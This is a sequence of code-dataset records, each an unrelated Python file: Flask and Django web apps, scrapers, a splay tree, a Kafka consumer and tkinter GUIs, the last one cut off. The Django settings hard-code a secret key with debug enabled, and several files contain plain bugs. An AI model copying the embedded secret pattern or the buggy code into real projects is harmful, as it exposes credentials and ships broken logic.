SECRET_KEY:\n return \"Assignment addition failed; key incorrect.\"\n assignment = Assignment(\n title=req_json['title'],\n desc=req_json['desc'],\n visible=req_json['visible'],\n date_due=datetime.date.fromordinal(req_json['date_due'])\n )\n db.session.add(assignment)\n db.session.commit()\n if assignment.visible:\n send_email_users_new_asgn(assignment)\n return \"Added assignment \" + str(assignment) + \" successfully.\"\n\n\n@app.route('/delassignment', methods=['POST'])\ndef delassignment():\n \"\"\"\n Utility view for deleting assignments.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment deletion failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment deletion failed; key incorrect.\"\n asgn = Assignment.query.filter(Assignment.id == req_json['asgn_id']).first()\n db.session.delete(asgn)\n return_str = \"Assignment \" + str(asgn) + \" deleted successfully.\"\n db.session.commit()\n return return_str\n\n\n@app.route('/getassignments', methods=['POST'])\ndef getassignments():\n \"\"\"\n Utility view for retrieving list of all assignments.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment retrieval failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment retrieval failed; key incorrect.\"\n asgn_ls = []\n for asgn in Assignment.query.all():\n asgn_ls.append(\n \"\" % (\n str(asgn.id),\n asgn.title,\n asgn.desc,\n str(asgn.visible),\n str(asgn.date_due)\n )\n )\n return \"\\n\".join(asgn_ls)\n\n\n@app.route('/editassignment', methods=['POST'])\ndef editassignment():\n \"\"\"\n Utility view for editing an assignment.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment editing failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment editing failed; key incorrect.\"\n asgn = Assignment.query.filter(Assignment.id == req_json['asgn_id']).first()\n if not asgn:\n return \"Assignment editing fail; does not exist.\"\n asgn.title = req_json['title']\n asgn.desc = req_json['desc']\n asgn.visible = req_json['visible']\n asgn.date_due = datetime.date.fromordinal(req_json['date_due'])\n db.session.commit()\n if assignment.visible:\n send_email_users_new_asgn(assignment)\n return \"Assignment edited successfully.\"\n\n\n@app.route('/addtest', methods=['POST'])\ndef addtest():\n \"\"\"\n Utility view for adding assignment tests.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Test addition failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Test addition failed; key incorrect.\"\n test = AssignmentTest(\n asgn_id=req_json['asgn_id'],\n test_inp=req_json['test_inp'],\n test_out=req_json['test_out'],\n )\n db.session.add(test)\n db.session.commit()\n return \"Added assignment test \" + str(test) + \" successfully.\"\n\n\n@app.route('/deltest', methods=['POST'])\ndef deltest():\n \"\"\"\n Utility view for deleting assignment tests.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment deletion failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment deletion failed; key incorrect.\"\n test = AssignmentTest.query.filter(AssignmentTest.id == req_json['test_id']).first()\n return_str = \"Assignment test\" + str(test) + \" deleted successfully.\"\n db.session.delete(test)\n db.session.commit()\n return return_str\n\n\n@app.route('/getalltests', methods=['POST'])\ndef getalltests():\n \"\"\"\n Utility view for retrieving list of all assignment tests.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Test retrieval failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Test retrieval failed; key incorrect.\"\n test_ls = []\n for test in AssignmentTest.query.all():\n test_ls.append(\n \"\" % (\n str(test.id),\n str(test.asgn_id),\n test.test_inp,\n test.test_out\n )\n )\n return \"\\n\".join(test_ls)\n\n\n@app.errorhandler(404)\ndef not_found_editor(error):\n db.session.rollback()\n return render_template(\"partials/404.html\"), 404\n\n\n@app.errorhandler(500)\ndef not_found_editor(error):\n db.session.rollback()\n return render_template(\"partials/500.html\"), 500\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"479205701","text":"# USAGE\n# python visualize_barcode.py --avgs output/jurassic_park_trailer.json --barcode output/jurassic_park_trailer.png --barcode-width 5\n\n# import the necessary packages\nimport numpy as np\nimport argparse\nimport json\nimport cv2\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-a\", \"--avgs\", required=True,\n\thelp=\"path to averages JSON file\")\nap.add_argument(\"-b\", \"--barcode\", required=True,\n\thelp=\"path to output barcode visualization image\")\nap.add_argument(\"-t\", \"--height\", type=int, default=250,\n\thelp=\"height of output barcode image\")\nap.add_argument(\"-w\", \"--barcode-width\", type=int, default=1,\n\thelp=\"width of each bar in output image\")\nargs = vars(ap.parse_args())\n\n# load the averages file and convert it to a NumPy array\navgs = json.loads(open(args[\"avgs\"]).read())\navgs = np.array(avgs, dtype=\"int\")\n\n# grab the individual bar width and allocate memory for\n# the barcode visualization\nbw = args[\"barcode_width\"]\nbarcode = np.zeros((args[\"height\"], len(avgs) * bw, 3),\n\tdtype=\"uint8\")\n\n# loop over the averages and create a single 'bar' for\n# each frame average in the list\nfor (i, avg) in enumerate(avgs):\n\tcv2.rectangle(barcode, (i * bw, 0), ((i + 1) * bw,\n\t\targs[0]), avg, -1)\n\n# write the video barcode visualization to file and then\n# display it to our screen\ncv2.imwrite(args[\"barcode\"], barcode)\ncv2.imshow(\"Barcode\", barcode)\ncv2.waitKey(0)\n","sub_path":"assets/img/visualize_barcode.py","file_name":"visualize_barcode.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"514068643","text":"\"\"\"\nDjango settings for coursefinityProject project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\nPROJECT_PATH = os.path.join(BASE_DIR, os.pardir)\nPROJECT_PATH = os.path.abspath(PROJECT_PATH)\nTEMPLATE_PATH = os.path.join(PROJECT_PATH, 'templates')\n\n#/Users/dbronola/coursefinityProject/templates\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\n# remove before deployment\nSECRET_KEY = 'z_p3bqsj0=+)rj8m3dx6=acj_&ci36nw(m+vwi$lj6k9jkgf8j'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'coursefinity',\n 'south',\n 'storages', #added for s3\n 'boto',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'coursefinityProject.urls'\n\nWSGI_APPLICATION = 'coursefinityProject.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'coursefinity',\n 'USER': 'dbronola',\n 'PASSWORD': '',\n 'HOST': 'localhost',\n 'PORT': '',\n\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_ROOT = \"http://s3.amazonaws.com/coursefinity-assets/static\"\n\nSTATIC_PATH = os.path.join(PROJECT_PATH, 'static')\n\nSTATIC_URL = '/static/'\n\n#uncomment for aws\n\n####FOR DEPLOYMENT###\nif not DEBUG:\n AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']\n AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\n STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n S3_URL = 'http://%s.s3.amazonaws.com/' % AWS_STORAGE_BUCKET_NAME\n STATIC_URL = S3_URL\n\nSTATICFILES_DIRS = (\n STATIC_PATH,\n )\n\nTEMPLATE_DIRS = (\n TEMPLATE_PATH,\n )\n\n\n\n#ADDED FOR DEPLOYMENT SETTINGS \n#uncomment before deployment\n#ALLOWED_HOSTS = ['*']\n\n#import dj_database_url\n\n#DATABASES['default'] = dj_database_url.config()\n\n#################################################\n\n","sub_path":"coursefinityProject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"389068652","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-4-29 下午4:03\n# @Author : Sylor\n# @File : meizian.py\n# @Software: PyCharm\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nfrom multiprocessing import Pool\nfrom config import *\nimport pymongo\n\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[MONGO_DB]\n\ndef response(all_url):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'}\n response_a = requests.get(all_url,headers=headers)\n if response_a.status_code == 200:\n return response_a\n else:\n print('链接错误')\n except:\n return None\n\ndef get_html(all_url):\n try:\n html = response(all_url)\n all_a= BeautifulSoup(html.text,'lxml').find('div',class_='gallery galleryindex').find_all('a')\n for a in all_a:\n data = {\n 'title': a.img.attrs['alt'],\n 'link': 'http://meizian.com'+a.attrs['href']\n }\n parse_html = data['link']\n path = data['title'].replace(\"/\", '_')\n print('正在创建文件夹')\n mkdir(path)\n parse_index(parse_html)\n save_to_mongo(data)\n except:\n return None\n\ndef parse_index(parse_html):\n page_content = response(parse_html)\n page_a = BeautifulSoup(page_content.text,'lxml').find('div',class_='text-center').find_all('a')[:-2]\n for a in page_a:\n page_html = 'http://meizian.com' + a['href']\n img_html(page_html)\n\ndef img_html(page_html):\n parse_content = response(page_html)\n img_a = BeautifulSoup(parse_content.text,'lxml').find('div',id='gallery').find_all('a')\n for a in img_a:\n imgs = a['href']\n print(imgs)\n print('正在准备保存图片')\n save_img(imgs)\n\ndef save_img(imgs):\n img = response(imgs)\n name = imgs[-12:-4]\n f=open(name+'.jpg','ab')\n f.write(img.content)\n f.close()\n print('保存完毕')\n\ndef save_to_mongo(data):\n if db[MONGO_TABLE].insert(data):\n print('存储到MongoDB成功')\n return True\n\ndef mkdir(path):\n path = path.strip()\n os.makedirs(os.path.join(\"/opt/meizian2\",path))\n os.chdir(os.path.join(\"/opt/meizian2/\"+path))\n\n\ndef main(p):\n all_url = 'http://meizian.com/meitui.html' + '?p=' +str(p)\n get_html(all_url)\n\n\nif __name__ == '__main__':\n pool = Pool()\n pool.map(main,[p for p in range(1,76)])\n\n\n\n","sub_path":"meizian.py","file_name":"meizian.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"77136387","text":"\n\nfrom xai.brain.wordbase.verbs._irradiate import _IRRADIATE\n\n#calss header\nclass _IRRADIATING(_IRRADIATE, ):\n\tdef __init__(self,): \n\t\t_IRRADIATE.__init__(self)\n\t\tself.name = \"IRRADIATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"irradiate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_irradiating.py","file_name":"_irradiating.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"551028241","text":"import os\nfrom flask import Flask\nfrom flask import render_template\nfrom flask_yaml_extended import Flask\nfrom competition import competition\n\napp = Flask(__name__)\napp.register_blueprint(competition)\n\napp.config.from_yaml(os.path.join(app.root_path, 'config.yml'))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/bihl')\ndef bihl():\n return render_template('2013-2014-schedule.html')\n\n\n@app.route('/test')\ndef home():\n active = 'home'\n return render_template('home.html', active=active)\n\n\n@app.route('/test/blog')\ndef blogs():\n active = 'blogs'\n return render_template('blog.html', active=active)\n\n\n@app.route('/test/contact')\ndef contact():\n active = 'contact'\n return render_template('contact.html', active=active)\n\n\n@app.route('/test/players')\ndef players():\n active = 'players'\n return render_template('players.html', active=active)\n\n\n@app.route('/test/gallery')\ndef gallery():\n active = 'gallery'\n return render_template('gallery.html', active=active)\n\n\nif __name__ == '__main__':\n # Bind to PORT if defined, otherwise default to 5000.\n port = int(os.environ.get('PORT', 5000))\n app.debug = True\n app.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"290829834","text":"import pandas as pd\nimport os\n\n\ndef remove_num_outliers(df):\n outlier_row_index = []\n for col in df._get_numeric_data():\n for val in df[col]:\n if abs(val-df[col].mean())/df[col].std() > 3:\n if df[df[col] == val].index.tolist()[0] not in outlier_row_index:\n outlier_row_index.append(df[df[col] == val].index.tolist()[0])\n\n print(outlier_row_index)\n return df\n\npd.set_option('display.max_rows', 1000)\nfn = os.path.join(os.path.dirname(__file__), 'data\\\\train.csv')\ntraining_data = pd.read_csv(fn, sep=',')\nremove_num_outliers(training_data)\n","sub_path":"outlier_detection.py","file_name":"outlier_detection.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123623349","text":"from chapter11.TreeMap import TreeMap\n\nclass SplayTree(TreeMap):\n\n def _splay(self,p):\n while p is not self.root:\n parent = self.parent(p)\n grand = self.parent(parent)\n\n if grand is None:\n #zig\n self._rotate(p)\n\n elif (parent == self.left(grand)) == (p == self.left(parent)):\n self._rotate(parent)\n self._rotate(p)\n\n else:\n self._rotate(p)\n self._rotate(p)\n\n def _rebalance_delete(self,p):\n if p is not None:\n self._splay(p)\n\n def _rebalance_access(self,p):\n self._splay(p)\n\n def _rebalance_insert(self,p):\n self._splay(p)\n\n\n","sub_path":"DSandAlgorithminPy/chapter11/SplayTree.py","file_name":"SplayTree.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"604790550","text":"import scraperwiki, urllib, simplejson\n\ndef replaces(_str):\n if len(_str)>0:\n _str = _str.replace(\",\",\"\");\n return int(_str);\n\nusernames = [\n \"davidayalas\",\"nodejs\"\n ]\n\nurlyql = \"http://query.yahooapis.com/v1/public/yql?q=select%20content%20from%20html%20where%20url%3D%22http%3A%2F%2Ftwitter.com%2F#username#%22%20and%20(xpath%3D'%2F%2F*%2Fspan%5B%40class%3D%22stat_count%22%5D'%20or%20xpath%3D'%2F%2F*%2Fspan%5B%40class%3D%22stats_count%20numeric%22%5D')&format=json&callback=\"\n\nfor x in usernames:\n \n result = simplejson.load(urllib.urlopen(urlyql.replace(\"#username#\",x)));\n \n if result[\"query\"] and result[\"query\"][\"results\"] and result[\"query\"][\"results\"][\"span\"]:\n dades = result[\"query\"][\"results\"][\"span\"];\n scraperwiki.datastore.save(unique_keys=[\"username\"],data={\"username\":x, \"tweets\":int(replaces(dades[0])),\"following\":int(replaces(dades[1])), \"followers\":int(replaces(dades[2])),\"listed\":int(replaces(dades[3]))});","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"95137522","text":"from typing import Any\n\nfrom app import app, mongo, auth, retrieveData, exceptionHandler\nimport os\nfrom flask import Flask, flash, request, redirect, url_for, abort, jsonify, session, g\nfrom werkzeug.utils import secure_filename\nfrom pymongo import MongoClient\nfrom bson import json_util, ObjectId, Binary\nfrom datetime import datetime, timedelta\nimport bcrypt\nimport numpy as np\nimport soundfile\nfrom flask_cors import CORS, cross_origin\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nclient = MongoClient()\nfolderName = 'uploads'\nUPLOAD_FOLDER = './' + folderName\nALLOWED_EXTENSIONS = set(['wav'])\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\ndb = client.speechDatabase\nrecordingsCollection = db.recordings\nusersCollection = db.users\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', defaults={'path': ''})\n@cross_origin()\ndef catch_all(path):\n return 'You want path: %s' % path\n\n@app.before_request\ndef before_request():\n if request.method != 'OPTIONS':\n if request.endpoint == 'login' or request.endpoint == 'register':\n admin = usersCollection.find_one({ 'email': 'admin' })\n if admin is None :\n usersCollection.insert_one(adminObj)\n elif 'Authorization' not in request.headers:\n raise exceptionHandler.InvalidUsage('Un Authorized User', status_code=420)\n if 'Authorization' in request.headers and auth.isUserLoggedIn(request.headers['Authorization']) is None:\n raise exceptionHandler.InvalidUsage('Session Timed Out', status_code=420)\n else:\n return ''\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n # file = request.files['file']\n # if file and allowed_file(file.filename):\n # filename = secure_filename(file.filename)\n # file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n # ## snippet to read code below\n # file.stream.seek(0) # seek to the beginning of file\n # myfile = file.file # will point to tempfile itself\n # dataframe = pd.read_csv(myfile)\n # ## end snippet\n user = auth.getLoggedInUser(request.headers['Authorization'])\n # check if the post request has the file part\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No file part')\n return exceptionHandler.InvalidUsage('Invalid Recording', status_code=420)\n if file and allowed_file(file.filename) and not mongo.existInDatabase(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n response = mongo.pushToDatabase(filename, user['email'], user['permission'])\n return mongo.prepareResponse(response)\n return '''\n \n Upload new File\n Upload new File
\n \n '''\n\nadminObj = {\n 'firstName' : 'admin', \n 'lastNname' : 'admin', \n 'email' : 'admin',\n 'empId' : '0000',\n 'password' : bcrypt.hashpw('password'.encode('utf-8'), bcrypt.gensalt()),\n 'industry' : 'admin', \n 'serviceLine' : 'admin', \n 'serviceArea' : 'admin', \n 'designation' : 'admin', \n 'location' : 'admin', \n 'mobileNo' : 'admin',\n 'permission': 'administrator'\n}\n\ndef getData(fileName):\n data, rate = soundfile.read(fileName)\n # power = np.array([])\n # frequency = np.array([])\n # with soundfile.SoundFile(fileName, 'r+') as f:\n # while f.tell() < f.frames:\n # pos = f.tell()\n # data = f.read(1024)\n # x = np.array(20*np.log10(np.abs(np.fft.rfft(data))))\n # if x.ndim >= 2:\n # x = x[:, 0]\n # power = np.concatenate([power,x[:, 0]])\n # frequency = np.concatenate([frequency, np.abs(np.linspace(0, rate/2.0, len(x)))])\n # f.seek(pos)\n # f.write(data*2)\n\n # frequency = np.abs(np.linspace(0, rate/2.0, len(power)))\n # power = [20*np.log10(np.abs(np.fft.rfft(block))) for block in data]\n if data.ndim >= 2:\n power = 20*np.log10(np.abs(np.fft.rfft(data[:, 0])))\n else:\n power = 20*np.log10(np.abs(np.fft.rfft(data[:])))\n frequency = np.abs(np.linspace(0, rate/2.0, len(power)))\n xValues = frequency.tolist()\n yValues = power.tolist()\n\n coordinates = []\n for index in range(0, len(power.tolist())):\n coordinate = {'x': xValues[index], 'y': yValues[index]}\n coordinates.append(coordinate)\n\n return coordinates\n\n@app.route('/getFileData', methods=['GET', 'POST'])\ndef getFileData():\n data = []\n fileData1 = getData(request.json['fileName1'])\n fileData2 = getData(request.json['fileName2'])\n return json_util.dumps({'fileData1':fileData1, 'fileData2':fileData2})\n\n@app.route('/getUserAudioFiles', methods=['GET', 'POST'])\ndef getUserAudioFiles():\n user = auth.getLoggedInUser(request.headers['Authorization'])\n print(user['email'])\n return mongo.retrieve(user['email'])\n\n@app.route('/getDemoUserAudioFiles', methods=['GET', 'POST'])\ndef getDemoUserAudioFiles():\n return retrieveData.retrieveDemoRecordings()\n\n@app.route('/getMyUserAudioFiles', methods=['GET', 'POST'])\ndef getMyUserAudioFiles():\n user = auth.getLoggedInUser(request.headers['Authorization'])\n return retrieveData.retrieveMyRecordings(user['email'])\n\n","sub_path":"flaskMiddleWare/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"124631902","text":"def agumentation(img,domain,x=0,y=0,h=0,w=0):\n '''\n this function helps to mask the different axis\n x - time and y - frequency in a spectrogram\n\n input enter image as a numpy array,domains( anyone among time,frequency,timeandfrequency),\n x,w for time\n y,h for frequency,\n x,w , y,h for time and frequency\n \n '''\n category_aug = domain\n\n if domain == 'frequency':\n img[y:y+h,:,:] = 0\n if domain == 'time':\n img[:,x:x+w,:] = 0\n if domain == 'timeandfrequency':\n img[x:x+w,y:y+h,:] =0\n return img \n","sub_path":"codes/agumentations.py","file_name":"agumentations.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178042713","text":"# Credit to https://stackoverflow.com/a/22722889/122364\nimport json\nimport sys\nimport uuid\nimport tkinter as tk\nfrom tkinter import ttk\n\n\ndef json_tree(tree, parent, dictionary):\n for key in dictionary:\n uid = uuid.uuid4()\n if isinstance(dictionary[key], dict):\n tree.insert(parent, 'end', uid, text=key)\n json_tree(tree, uid, dictionary[key])\n elif isinstance(dictionary[key], list):\n tree.insert(parent, 'end', uid, text=key + '[]')\n json_tree(tree,\n uid,\n dict([(i, x) for i, x in enumerate(dictionary[key])]))\n else:\n value = dictionary[key]\n if value is None:\n value = 'None'\n tree.insert(parent, 'end', uid, text=key, value=value)\n\n\ndef show_data(data):\n # Setup the root UI\n root = tk.Tk()\n root.title(\"JSON viewer\")\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # Setup the Frames\n tree_frame = ttk.Frame(root, padding=\"3\")\n tree_frame.grid(row=0, column=0, sticky=tk.NSEW)\n\n # Setup the Tree\n tree = ttk.Treeview(tree_frame, columns='Values')\n tree.column('Values', width=100, anchor='center')\n tree.heading('Values', text='Values')\n json_tree(tree, '', data)\n tree.pack(fill=tk.BOTH, expand=1)\n\n # Limit windows minimum dimensions\n root.update_idletasks()\n root.minsize(800, 800)\n root.mainloop()\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python JSON_browser.py [filename]\")\n else:\n with open(sys.argv[1]) as fh:\n show_data(json.load(fh)) \n","sub_path":"JSON_browser.py","file_name":"JSON_browser.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"460717964","text":"from urllib.request import urlopen as ureq\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\nfor page in range(1,38):\r\n my_url='https://stackoverflow.com/jobs?sort=i&pg='+str(page)\r\n uClient=ureq(my_url)\r\n page_html=uClient.read()\r\n uClient.close()\r\n\r\n page_soup=soup(page_html,\"html.parser\")\r\n job_summary=page_soup.findAll(\"div\",{\"class\":\"js-search-results flush-left\"})\r\n\r\n for job in job_summary:\r\n job_title = job.findAll(\"a\", {\"class\": \"s-link s-link__visited\"})\r\n job_skill = job.findAll(\"div\", {\"class\": \"mt12 -tags\"})\r\n\r\n for i in range(len(job_skill)):\r\n print(i,end=\">>\")\r\n print(job_title[i].string, end=\"<-------->\")\r\n skills = job_skill[i].findAll(\"a\", {\"class\": \"post-tag job-link no-tag-menu\"})\r\n for skill in skills:\r\n print(skill.string,end=\",\")\r\n print(\"\\n\")\r\n","sub_path":"WebScrappingDeveloperJobs.py","file_name":"WebScrappingDeveloperJobs.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"478268783","text":"from confluent_kafka import KafkaError\nfrom confluent_kafka.avro import AvroConsumer\nfrom confluent_kafka.avro.serializer import SerializerError\n\n\ninputTopicName = \"shakespeare_avro_topic_python\"\nc = AvroConsumer({\n 'bootstrap.servers': 'kafka:9092',\n 'group.id': 'kafka-avro-consumer-python',\n 'auto.offset.reset': 'earliest',\n 'schema.registry.url': 'http://schema-registry:8081'})\n\nc.subscribe([inputTopicName])\n\nwhile True:\n try:\n msg = c.poll(10)\n\n except SerializerError as e:\n print(\"Message deserialization failed for {}: {}\".format(msg, e))\n break\n\n if msg is None:\n continue\n\n if msg.error():\n if msg.error().code() == KafkaError._PARTITION_EOF:\n continue\n else:\n print(msg.error())\n break\n\n print('{}: {}'.format(msg.key(), msg.value()))\n\nc.close()","sub_path":"solution/kafka-avro/python/consumer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"438639919","text":"from tkinter import*\r\nimport random\r\nimport os\r\nfrom tkinter import messagebox\r\n\r\n#=============main=======================\r\nclass Bill_App:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.geometry(\"1350x700+0+0\")\r\n self.root.title(\"Billing Software\")\r\n bg_color = \"#badc57\"\r\n title = Label(self.root, text=\"Billing Software\", font=('times new roman', 30, 'bold'), pady=2, bd=12, bg=\"#badc57\", fg=\"Black\", relief=GROOVE)\r\n title.pack(fill=X)\r\n # ================variables=======================\r\n self.sanitizer = IntVar()\r\n self.mask = IntVar()\r\n self.hand_gloves = IntVar()\r\n self.syrup = IntVar()\r\n self.cream = IntVar()\r\n self.thermal_gun = IntVar()\r\n # ============grocery==============================\r\n self.rice = IntVar()\r\n self.food_oil = IntVar()\r\n self.wheat = IntVar()\r\n self.spices = IntVar()\r\n self.flour = IntVar()\r\n self.maggi = IntVar()\r\n #=============coldDrinks=============================\r\n self.sprite = IntVar()\r\n self.mineral = IntVar()\r\n self.juice = IntVar()\r\n self.coke = IntVar()\r\n self.lassi = IntVar()\r\n self.mountain_duo = IntVar()\r\n # ==============Total product price================\r\n self.medical_price = StringVar()\r\n self.grocery_price = StringVar()\r\n self.cold_drinks_price = StringVar()\r\n # ==============Customer==========================\r\n self.c_name = StringVar()\r\n self.c_phone = StringVar()\r\n self.bill_no = StringVar()\r\n x = random.randint(1000, 9999)\r\n self.bill_no.set(str(x))\r\n self.search_bill = StringVar()\r\n # ===============Tax================================\r\n self.medical_tax = StringVar()\r\n self.grocery_tax = StringVar()\r\n self.cold_drinks_tax = StringVar()\r\n # =============customer retail details======================\r\n F1 = LabelFrame(self.root, text=\"Customer Details\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F1.place(x=0, y=80, relwidth=1)\r\n\r\n cname_lbl = Label(F1, text=\"Customer Name:\", bg=bg_color, font=('times new roman', 15, 'bold'))\r\n cname_lbl.grid(row=0, column=0, padx=20, pady=5)\r\n cname_txt = Entry(F1, width=15, textvariable=self.c_name, font='arial 15', bd=7, relief=GROOVE)\r\n cname_txt.grid(row=0, column=1, pady=5, padx=10)\r\n\r\n cphn_lbl = Label(F1, text=\"Customer Phone:\", bg=\"#badc57\", font=('times new roman', 15, 'bold'))\r\n cphn_lbl.grid(row=0, column=2, padx=20, pady=5)\r\n cphn_txt = Entry(F1, width=15, textvariable=self.c_phone, font='arial 15', bd=7, relief=GROOVE)\r\n cphn_txt.grid(row=0, column=3, pady=5, padx=10)\r\n\r\n c_bill_lbl = Label(F1, text=\"Bill Number:\", bg=\"#badc57\", font=('times new roman', 15, 'bold'))\r\n c_bill_lbl.grid(row=0, column=4, padx=20, pady=5)\r\n c_bill_txt = Entry(F1, width=15, textvariable=self.search_bill, font='arial 15', bd=7, relief=GROOVE)\r\n c_bill_txt.grid(row=0, column=5, pady=5, padx=10)\r\n\r\n bil_btn = Button(F1, text=\"Search\", command=self.find_bill, width=10, bd=7, font=('arial', 12, 'bold'), relief=GROOVE)\r\n bil_btn.grid(row=0, column=6, pady=5, padx=10)\r\n\r\n # ===================Medical====================================\r\n F2 = LabelFrame(self.root, text=\"Medical Purpose\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F2.place(x=5, y=180, width=325, height=380)\r\n\r\n sanitizer_lbl = Label(F2, text=\"Sanitizer\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n sanitizer_lbl.grid(row=0, column=0, padx=10, pady=10, sticky='W')\r\n sanitizer_txt = Entry(F2, width=10, textvariable=self.sanitizer, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n sanitizer_txt.grid(row=0, column=1, padx=10, pady=10)\r\n\r\n mask_lbl 